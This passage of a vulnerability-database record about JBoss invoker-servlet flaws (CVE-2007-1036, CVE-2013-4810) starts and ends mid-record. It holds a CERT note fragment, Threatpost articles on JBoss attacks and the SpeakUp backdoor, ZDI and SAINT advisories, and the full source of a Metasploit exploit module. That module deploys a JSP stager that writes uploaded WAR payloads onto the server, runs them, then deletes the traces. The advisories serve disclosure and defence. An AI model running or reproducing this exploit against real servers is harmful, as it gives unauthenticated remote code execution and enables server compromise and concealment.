<http://wiki.jboss.org/wiki/Wiki.jsp?page=LimitAccessToCertainClients>\n * <http://www.jboss.com/>\n * <http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss>\n * <http://archives.neohapsis.com/archives/bugtraq/2007-02/0347.html>\n\n### Acknowledgements\n\nThis vulnerability was reported by Ben Dexter.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-1036](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-1036>) \n---|--- \n**Severity Metric:** | 2.25 \n**Date Public:** | 2007-02-20 \n**Date First Published:** | 2007-02-20 \n**Date Last Updated: ** | 2007-02-21 22:50 UTC \n**Document Revision: ** | 32 \n", "cvss3": {}, "published": "2007-02-20T00:00:00", "type": "cert", "title": "JBoss Application Server may not properly restrict access to the administrative interface", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036"], "modified": "2007-02-21T22:50:00", "id": "VU:632656", "href": "https://www.kb.cert.org/vuls/id/632656", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:15", "description": "", "cvss3": {}, "published": "2012-09-05T00:00:00", "type": "packetstorm", "title": "JBoss DeploymentFileRepository WAR Deployment", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2007-1036"], "modified": "2012-09-05T00:00:00", "id": "PACKETSTORM:116241", "href": "https://packetstormsecurity.com/files/116241/JBoss-DeploymentFileRepository-WAR-Deployment.html", "sourceData": "`require 'msf/core' \n \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /JBoss/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)', \n'Description' => %q{ \nThis module can be used to execute a payload on JBoss servers that have an \nexposed HTTPAdaptor's JMX Invoker exposed on the \"JMXInvokerServlet\". By invoking \nthe methods provided by jboss.admin:DeploymentFileRepository a stager is deployed \nto finally upload the selected payload to the target. The DeploymentFileRepository \nmethods are only available on Jboss 4.x and 5.x. \n}, \n'Author' => [ \n'Patrick Hof', # Vulnerability discovery, analysis and PoC \n'Jens Liebchen', # Vulnerability discovery, analysis and PoC \n'h0ng10' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2007-1036' ], \n[ 'OSVDB', '33744' ], \n[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ], \n], \n'DisclosureDate' => 'Feb 20 2007', \n'Privileged' => true, \n'Platform' => ['java', 'win', 'linux' ], \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Targets' => \n[ \n \n# do target detection but java meter by default \n[ 'Automatic', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n], \n \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n}, \n], \n \n# \n# Platform specific targets \n# \n[ 'Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n}, \n], \n \n[ 'Linux x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n}, \n], \n], \n \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]), \nOptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]), \nOptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]), \n], self.class) \n \nend \n \ndef check \nres = send_serialized_request('version.bin') \nif (res.nil?) or (res.code != 200) \nprint_error(\"Unable to request version, returned http code is: #{res.code.to_s}\") \nreturn Exploit::CheckCode::Unknown \nend \n \n# Check if the version is supported by this exploit \nreturn Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/ \nreturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/ \nreturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/ \n \nif res.body =~ /ServletException/ # Simple check, if we caused an exception. \nprint_status(\"Target seems vulnerable, but the used JBoss version is not supported by this exploit\") \nreturn Exploit::CheckCode::Appears \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nmytarget = target \n \nif (target.name =~ /Automatic/) \nmytarget = auto_target \nfail_with(\"Unable to automatically select a target\") if not mytarget \nprint_status(\"Automatically selected target: \\\"#{mytarget.name}\\\"\") \nelse \nprint_status(\"Using manually select target: \\\"#{mytarget.name}\\\"\") \nend \n \n \n# We use a already serialized stager to deploy the final payload \nregex_stager_app_base = rand_text_alpha(14) \nregex_stager_jsp_name = rand_text_alpha(14) \nname_parameter = rand_text_alpha(8) \ncontent_parameter = rand_text_alpha(8) \nstager_uri = \"/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp\" \nstager_code = \"A\" * 810 # 810 is the size of the stager in the serialized request \n \nreplace_values = { \n'regex_app_base' => regex_stager_app_base, \n'regex_jsp_name' => regex_stager_jsp_name, \nstager_code => generate_stager(name_parameter, content_parameter) \n} \n \nprint_status(\"Deploying stager\") \nsend_serialized_request('installstager.bin', replace_values) \nprint_status(\"Calling stager: #{stager_uri}\") \ncall_uri_mtimes(stager_uri, 5, 'GET') \n \n# Generate the WAR with the payload which will be uploaded through the stager \napp_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) \njsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) \n \nwar_data = payload.encoded_war({ \n:app_name => app_base, \n:jsp_name => jsp_name, \n:arch => mytarget.arch, \n:platform => mytarget.platform \n}).to_s \n \nb64_war = Rex::Text.encode_base64(war_data) \nprint_status(\"Uploading payload through stager\") \nres = send_request_cgi({ \n'uri' => stager_uri, \n'method' => \"POST\", \n'vars_post' => \n{ \nname_parameter => app_base, \ncontent_parameter => b64_war \n} \n}, 20) \n \npayload_uri = \"/#{app_base}/#{jsp_name}.jsp\" \nprint_status(\"Calling payload: \" + payload_uri) \nres = call_uri_mtimes(payload_uri,5, 'GET') \n \n# Remove the payload through stager \nprint_status(\"Removing payload through stager\") \ndelete_payload_uri = stager_uri + \"?#{name_parameter}=#{app_base}\" \nres = send_request_cgi( \n{'uri' => delete_payload_uri, \n}) \n \n# Remove the stager \nprint_status(\"Removing stager\") \nsend_serialized_request('removestagerfile.bin', replace_values) \nsend_serialized_request('removestagerdirectory.bin', replace_values) \n \nhandler \nend \n \ndef generate_stager(name_param, content_param) \nwar_file = rand_text_alpha(4+rand(4)) \nfile_content = rand_text_alpha(4+rand(4)) \njboss_home = rand_text_alpha(4+rand(4)) \ndecoded_content = rand_text_alpha(4+rand(4)) \npath = rand_text_alpha(4+rand(4)) \nfos = rand_text_alpha(4+rand(4)) \nname = rand_text_alpha(4+rand(4)) \nfile = rand_text_alpha(4+rand(4)) \n \nstager_script = <<-EOT \n<%@page import=\"java.io.*, \njava.util.*, \nsun.misc.BASE64Decoder\" \n%> \n<% \nString #{file_content} = \"\"; \nString #{war_file} = \"\"; \nString #{jboss_home} = System.getProperty(\"jboss.server.home.dir\"); \nif (request.getParameter(\"#{content_param}\") != null){ \ntry { \n#{file_content} = request.getParameter(\"#{content_param}\"); \n#{war_file} = request.getParameter(\"#{name_param}\"); \nbyte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content}); \nString #{path} = #{jboss_home} + \"/deploy/\" + #{war_file} + \".war\"; \nFileOutputStream #{fos} = new FileOutputStream(#{path}); \n#{fos}.write(#{decoded_content}); \n#{fos}.close(); \n} \ncatch(Exception e) {} \n} \nelse { \ntry{ \nString #{name} = request.getParameter(\"#{name_param}\"); \nString #{file} = #{jboss_home} + \"/deploy/\" + #{name} + \".war\"; \nnew File(#{file}).delete(); \n} \ncatch(Exception e) {} \n} \n \n%> \nEOT \n \n# The script must be exactly 810 characters long, otherwise we might have serialization issues \n# Therefore we fill the rest wit spaces \nspaces = \" \" * (810 - stager_script.length) \nstager_script << spaces \nend \n \n \ndef send_serialized_request(file_name , replace_params = {}) \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"jboss_jmxinvoker\", \"DeploymentFileRepository\", file_name) \ndata = File.open( path, \"rb\" ) { |fd| data = fd.read(fd.stat.size) } \n \nreplace_params.each { |key, value| data.gsub!(key, value) } \n \nres = send_request_cgi({ \n'uri' => target_uri.path, \n'method' => 'POST', \n'data' => data, \n'headers' => \n{ \n'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation', \n'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' \n} \n}, 25) \n \n \nif (not res) or (res.code != 200) \nprint_error(\"Failed: Error requesting preserialized request #{file_name}\") \nreturn nil \nend \n \nres \nend \n \n \ndef call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil) \n# JBoss might need some time for the deployment. Try 5 times at most and \n# wait 5 seconds inbetween tries \nnum_attempts.times do |attempt| \nif (verb == \"POST\") \nres = send_request_cgi( \n{ \n'uri' => uri, \n'method' => verb, \n'data' => data \n}, 5) \nelse \nuri += \"?#{data}\" unless data.nil? \nres = send_request_cgi( \n{ \n'uri' => uri, \n'method' => verb \n}, 30) \nend \n \nmsg = nil \nif (!res) \nmsg = \"Execution failed on #{uri} [No Response]\" \nelsif (res.code < 200 or res.code >= 300) \nmsg = \"http request failed to #{uri} [#{res.code}]\" \nelsif (res.code == 200) \nprint_status(\"Successfully called '#{uri}'\") if datastore['VERBOSE'] \nreturn res \nend \n \nif (attempt < num_attempts - 1) \nmsg << \", retrying in 5 seconds...\" \nprint_status(msg) if datastore['VERBOSE'] \nselect(nil, nil, nil, 5) \nelse \nprint_error(msg) \nreturn res \nend \nend \nend \n \n \ndef auto_target \nprint_status(\"Attempting to automatically select a target\") \n \nplat = detect_platform() \narch = detect_architecture() \n \nreturn nil if (not arch or not plat) \n \n# see if we have a match \ntargets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) } \n \n# no matching target found \nreturn nil \nend \n \n \n# Try to autodetect the target platform \ndef detect_platform \nprint_status(\"Attempting to automatically detect the platform\") \nres = send_serialized_request(\"osname.bin\") \n \nif (res.body =~ /(Linux|FreeBSD|Windows)/i) \nos = $1 \nif (os =~ /Linux/i) \nreturn 'linux' \nelsif (os =~ /FreeBSD/i) \nreturn 'linux' \nelsif (os =~ /Windows/i) \nreturn 'win' \nend \nend \nnil \nend \n \n \n# Try to autodetect the architecture \ndef detect_architecture() \nprint_status(\"Attempting to automatically detect the architecture\") \nres = send_serialized_request(\"osarch.bin\") \nif (res.body =~ /(i386|x86)/i) \narch = $1 \nif (arch =~ /i386|x86/i) \nreturn ARCH_X86 \n# TODO, more \nend \nend \nnil \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/116241/jboss_invoke_deploy.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2018-10-06T22:59:47", "description": "Attackers are exploiting a two-year-old vulnerability in JBoss Application Servers that enables a hacker to remotely get a shell on a vulnerable webserver. The number of infections has surged since[ exploit code called pwn.jsp](<http://blog.imperva.com/2013/11/threat-advisory-a-jboss-as-exploit-web-shell-code-injection.html>) was publicly disclosed Oct. 4.\n\nResearchers at Imperva said that a number of government and education websites have been compromised, as indicated by data collected through the company\u2019s honeypots. An attacker with remote shell access can inject code into a website run by the server or hunt and peck for files stored on the machine and extract them.\n\nThe vulnerability in the HTTP Invoker service that provides RMI/HTTP access to Enterprise Java Beans, was discovered in 2011 and presented at a number of security events that year.\n\n\u201cThe vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server,\u201d said Imperva\u2019s Barry Shteiman. \u201cOnce the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that application server.\u201d\n\nOn Sept. 16, the National Vulnerability Database issued an [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810>) warning of a remote code execution bug affecting HP ProCurve Manager, network management software. The vulnerability was given the NVD\u2019s highest criticality ranking of 10. Since then, other products running the affected JBoss Application Server have been identified, including some security software.\n\nWithin three weeks, an exploit was added to [exploit-db](<http://www.exploit-db.com/exploits/28713/>) that successfully gained shell against a product running JBoss 4.0.5.\n\n\u201cImmediately thereafter, we had witnessed a surge in JBoss hacking, which manifested in malicious traffic originating from the infected servers and observed in Imperva\u2019s honeypot array,\u201d Shteiman said.\n\nAccording to Imperva\u2019s analysis, the vulnerability lies in the Invoker service, which operates at the remote management level enabling applications to access the server. The Invoker improperly exposes the management interface, Shteiman said.\n\nCompounding the problem is that in addition to the pwn.jsp shell, Shteiman said there is another more sophisticated shell available to attackers.\n\n\u201cIn these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities,\u201d he said.\n\nImperva also said that the number of webservers running JBoss software has tripled since the initial vulnerability research was made public.\n", "cvss3": {}, "published": "2013-11-19T16:07:59", "type": "threatpost", "title": "JBoss AS Attacks Up Since Exploit Code Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-11-21T15:18:24", "id": "THREATPOST:7E20261F9330304969941B4755E98BAA", "href": "https://threatpost.com/jboss-attacks-up-since-exploit-code-disclosure/102971/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-04T07:14:14", "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and, it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. And, he said that since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.\n\nThe actual trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nAfter registering the victim machine with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks on a fixed-interval basis of every three seconds. The C2 can say \u201cno task\u201d \u2013 or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; a Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[![speakup malware infection rate](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate-300x137.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png>)\n\nSpeakUp\u2019s daily infection rate (click to enlarge)\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. According to [XMRHunter,](<https://www.xmrhunter.com/>) the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[![SpeakUp malware detections](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT-300x163.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png>)\n\nSpeakUp has no detections in VirusTotal.\n\nThe initial victims have in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. \u201cNot only this was highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of time in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. _\n", "cvss3": {}, "published": "2019-02-04T14:00:15", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2016-3088", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-2894"], "modified": "2019-02-04T14:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T21:01:23", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus and Application Lifecycle Management. Authentication is not required to exploit this vulnerability. The specific flaw exists within the exposed EJBInvokerServlet and JMXInvokerServlet. An unauthenticated attacker can post a marshalled object allowing them to install an arbitrary application on the target server. A remote attacker can abuse this to execute remote code under the context of the SYSTEM user in HP PCM Plus and with administrative privileges on Application Lifecycle Management.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ and Application Lifecycle Management JBoss Invoker Servlets Marshalled Object Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-229", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-229/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:59", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitray Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:73B78E4CC6A84900DDFE755805A5092F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitray Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:F331FA17751309C5BD461AF4E8A90312", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:17", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitray Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:88A58EBA93902ACCCFD4D15339D739F8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:34", "description": "Added: 10/23/2013 \nCVE: [CVE-2013-4810](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810>) \nBID: [62854](<http://www.securityfocus.com/bid/62854>) \nOSVDB: [97153](<http://www.osvdb.org/97153>) \n\n\n### Background\n\nMcAfee Web Reporter analyzes logs from a variety of proxy sources to provide real-time views into web traffic, including extensive drill-down capabilities and powerful off-line processing. \n\n### Problem\n\nMcAfee Web Reporter is vulnerable to remote code execution due to embedding a vulnerable version of JBoss. The vulnerability is due to the application not properly restricting access to the invoker/EJBInvokerServlet which can be exploited to deploy and execute arbitray Java code by sending a specially crafted marshalled object to TCP port 9111. \n\n### Resolution\n\nContact the vendor for a solution. \n\n### References\n\n<http://secunia.com/advisories/55112/> \n<http://retrogod.altervista.org/9sg_ejb.html> \n\n\n### Limitations\n\nThis exploit was tested against McAfee Web Reporter 5.2.1 on Windows Server 2008 R2 SP1 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-10-23T00:00:00", "type": "saint", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 